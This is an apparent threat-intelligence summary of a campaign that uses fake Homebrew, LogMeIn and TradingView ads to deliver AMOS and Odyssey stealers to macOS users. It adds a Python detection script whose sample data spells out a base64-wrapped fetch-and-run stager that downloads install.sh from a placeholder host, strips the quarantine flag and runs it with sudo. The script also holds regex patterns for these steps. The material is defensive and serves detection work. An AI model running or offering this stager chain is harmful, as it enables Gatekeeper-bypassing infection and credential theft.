Full Report
A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. [...]
Analysis Summary
# Tool/Technique: AMOS (Atomic macOS Stealer) & Odyssey Stealer
## Overview
A malware campaign leveraging malvertising (Google Ads) to trick macOS users into installing information-stealing malware, specifically AMOS and Odyssey. Threat actors impersonate legitimate services like Homebrew, LogMeIn, and TradingView. The infection relies on a "ClickFix" technique where users are persuaded to execute malicious commands in the Terminal.
## Technical Details
- Type: Malware family (AMOS, Odyssey) | Technique (ClickFix/Malvertising)
- Platform: macOS
- Capabilities: Information theft, credential harvesting, a backdoor component for persistent remote access (AMOS).
- First Seen: AMOS first documented in April 2023. Odyssey documented in Summer 2025 (derived from Poseidon Stealer/AMOS).
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1588.002 - Obtain Capabilities: Develop Capabilities (Malware as a Service model, AMOS)
- T1566.002 - Phishing: Spearphishing Link (Via malicious ads leading to fake sites)
- TA0002 - Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- TA0003 - Privilege Escalation
- T1548.003 - Abuse Elevation Control Mechanism: Bypass User Account Control (Invoking `sudo`)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Information Gathering:** Collects detailed hardware and memory information upon execution.
- **Execution Chain:** Fetches and decodes an `install.sh` script, downloads a payload binary, removes quarantine flags, and bypasses Gatekeeper prompts.
- **Persistence/Evasion:** Checks for a virtual machine or analysis system environment before execution. Explicitly uses `sudo` to gain root privileges.
- **System Manipulation:** Kills legitimate processes like OneDrive updater daemons and interacts with macOS XPC services to blend in.
- **Data Theft:** Harvests browser credentials (Chrome, Firefox, Safari), cryptocurrency wallet credentials (over 100 extensions), Keychain data, and personal files.
- **Exfiltration:** Zips the stolen data and sends it to the C2 server.
### Advanced Features
- **AMOS Specific:** Functions as Malware-as-a-Service (MaaS), recently updated with a backdoor component for persistent remote access.
- **Odyssey Specific:** Derived from Poseidon Stealer (which was forked from AMOS). Targets credentials and cookies.
- **ClickFix Delivery:** Uses malicious Google Ads promoting fake download sites (Homebrew, LogMeIn, TradingView) that place an installation command on the clipboard and instruct the user to paste it into the Terminal, so the infection runs the moment the user complies.
- **Base64 Encoding:** On fake TradingView sites, a displayed command differs from the copied command, which is base64-encoded for obfuscation.
## Indicators of Compromise
- File Hashes: [Not explicitly available in the text]
- File Names: `install.sh` (staged file)
- Registry Keys: [Not applicable for macOS primary focus]
- Network Indicators: C2 servers/domains used for exfiltration (Not explicitly detailed or defanged in the text, but implied through C2 communication).
- Behavioral Indicators: Execution of shell commands via copy/paste in Terminal; invocation of `sudo`; checking for VM environment; termination of OneDrive updater daemons; interaction with macOS XPC services.
## Associated Threat Actors
- The threat actors utilizing AMOS (which operates as a MaaS platform).
- The specific group orchestrating this malvertising campaign (Identified by Hunt.io).
## Detection Methods
- Signature-based detection: for known AMOS/Odyssey binaries.
- Behavioral detection: Monitoring for dynamic execution from clipboard/shell commands; unauthorized use of `sudo`; attempts to harvest credentials from specific browser/wallet directories; termination of known system services.
- YARA rules: [Not available in the text]
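As an added example (not code from the report, from Hunt.io, or from any vendor), the script below turns the behavioural indicators above into a small triage check over process-execution events, and, because the fake TradingView pages hand the user a base64-wrapped command that differs from the one displayed, it decodes any base64 token in the command line before matching. The JSON-lines event format, the indicator weights, the alert threshold and the sample events (including the `example.invalid` placeholder domain) are all assumptions constructed for the example.

```python
import base64
import binascii
import json
import re

# Behavioural indicators taken from the report's detection and IoC sections.
# The weights and the alert threshold are illustrative assumptions, not tuned
# values; adjust them to your own telemetry.
INDICATORS = {
    "pipe_to_shell": (re.compile(r"\|\s*(?:/bin/)?(?:sh|bash|zsh)\b"), 3),
    "base64_decode": (re.compile(r"base64\s+(?:-d|-D|--decode)\b"), 2),
    "quarantine_strip": (re.compile(r"xattr\b.*(?:com\.apple\.quarantine|\s-c\b)"), 4),
    "sudo": (re.compile(r"(?<![\w-])sudo\b"), 2),
    "remote_fetch": (re.compile(r"\b(?:curl|wget)\b"), 1),
    "install_sh": (re.compile(r"\binstall\.sh\b"), 1),
}
ALERT_THRESHOLD = 5

# Runs of base64 alphabet long enough to be worth decoding.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_embedded_base64(cmd):
    """Return the plaintext of every base64 token in cmd that decodes to text.

    ClickFix pages hide the real command behind base64, so the indicators
    must be evaluated on the decoded text as well as on the raw command line.
    """
    decoded = []
    for token in _B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            decoded.append(text)
    return decoded


def score_command(cmd):
    """Score a command line against INDICATORS; each indicator counts once."""
    haystack = "\n".join([cmd] + decode_embedded_base64(cmd))
    hits = [name for name, (pattern, _) in INDICATORS.items()
            if pattern.search(haystack)]
    score = sum(INDICATORS[name][1] for name in hits)
    return score, hits


def command_line(argv):
    """Recover the shell command from an exec event's argv."""
    if "-c" in argv:
        return argv[argv.index("-c") + 1]  # `zsh -c '<command>'`
    return " ".join(argv)


def triage(lines, threshold=ALERT_THRESHOLD):
    """Score each JSON-lines exec event and flag those over the threshold."""
    results = []
    for line in lines:
        event = json.loads(line)
        cmd = command_line(event["argv"])
        score, hits = score_command(cmd)
        results.append({
            "ts": event["ts"],
            "parent": event.get("parent", "?"),
            "command": cmd,
            "score": score,
            "indicators": hits,
            "alert": score >= threshold,
        })
    return results


# Constructed sample events (not real telemetry). The second one reproduces the
# chain the report describes (fetch install.sh, strip the quarantine flag, run
# it under sudo), wrapped in base64 the way the fake TradingView pages do; the
# domain is a reserved placeholder.
_STAGER = (
    "curl -fsSL https://updates.example.invalid/install.sh -o /tmp/install.sh && "
    "xattr -d com.apple.quarantine /tmp/install.sh && sudo sh /tmp/install.sh"
)
_ENCODED = base64.b64encode(_STAGER.encode()).decode()

SAMPLE_EVENTS = [
    json.dumps({"ts": "2025-09-01T10:00:00Z", "parent": "Terminal",
                "argv": ["/bin/zsh", "-c", "brew install jq"]}),
    json.dumps({"ts": "2025-09-01T10:05:00Z", "parent": "Terminal",
                "argv": ["/bin/zsh", "-c", f"echo {_ENCODED} | base64 -d | bash"]}),
    json.dumps({"ts": "2025-09-01T10:07:00Z", "parent": "launchd",
                "argv": ["/usr/bin/sudo", "softwareupdate", "-l"]}),
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        flag = "ALERT" if r["alert"] else "ok   "
        print(f"{flag} {r['ts']} score={r['score']:2d} {r['indicators']} :: {r['command'][:60]}")
```

Only the base64-wrapped pasted command crosses the threshold: the raw line already scores on the pipe-to-shell and `base64 -d` indicators, and decoding the token adds the quarantine-flag removal, `sudo`, `curl` and `install.sh` hits, whereas a lone `sudo softwareupdate` from `launchd` stays well below it. In a real deployment the events would come from an endpoint sensor's process-exec stream, and the `parent` field is the natural place to add context such as whether the shell was spawned by Terminal right after a clipboard paste.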
## Mitigation Strategies
- **User Education:** Strongly advise users against pasting commands directly into the Terminal from untrusted sources (especially search engine ads).
- **Security Best Practices:** Do not trust software obtained through general paid search advertisements. Verify official download sources.
- **System Hardening:** Implement strong endpoint monitoring for runtime process creation stemming from script execution, especially those involving `sudo`.
## Related Tools/Techniques
- Poseidon Stealer (Precursor/Ancestor to Odyssey Stealer)
- Malvertising/ClickFix Techniques (Initial Access vectors)
- Homebrew (Impersonated platform)
- LogMeIn (Impersonated platform)
- TradingView (Impersonated platform)